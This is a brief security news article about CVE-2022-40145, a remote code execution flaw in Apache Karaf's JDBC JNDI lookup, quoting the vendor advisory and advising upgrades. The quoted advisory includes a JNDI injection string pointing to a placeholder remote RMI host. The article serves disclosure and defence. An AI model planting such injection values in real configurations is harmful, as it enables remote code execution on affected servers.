CVE-2022-40145: Apache Karaf Remote Code Execution Vulnerability

Security researcher Xun Bai has found a remote code execution vulnerability in the popular Apache Karaf that could allow remote attackers to run malicious code on the affected systems.

Tracked as CVE-2022-40145, the vulnerability is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL.

Apache Karaf is a modulith runtime, supporting several frameworks and programming models (REST/API, web, spring boot, …). It provides turnkey features that you can directly leverage without effort, packaged as mutable or immutable applications.

Apache Karaf could allow a remote attacker to execute arbitrary code on the system, caused by an LDAP injection flaw in the jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) function. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.

“The method jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasourceuse uses InitialContext.lookup(jndiName) without filtering. An user can modifyÂ `options.put(JDBCUtils.DATASOURCE, “osgi:” +Â DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,”jndi:rmi://x.x.x.x:xxxx/Command”);` in JdbcLoginModuleTest#setup,” Apache Karaf wrote in its advisory.

“This is vulnerable to a remote code execution (RCE) attack when aconfiguration uses a JNDI LDAP data source URI when an attacker hascontrol of the target LDAP server.”

CVE-2022-40145 affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. Apache Karaf users are encouraged to upgrade to versions 4.3.8 or 4.4.2 or use the correct path to avoid possible exploitation.

Rate this post

Tags: Apache Karaf CVE-2022-40145

Found this helpful?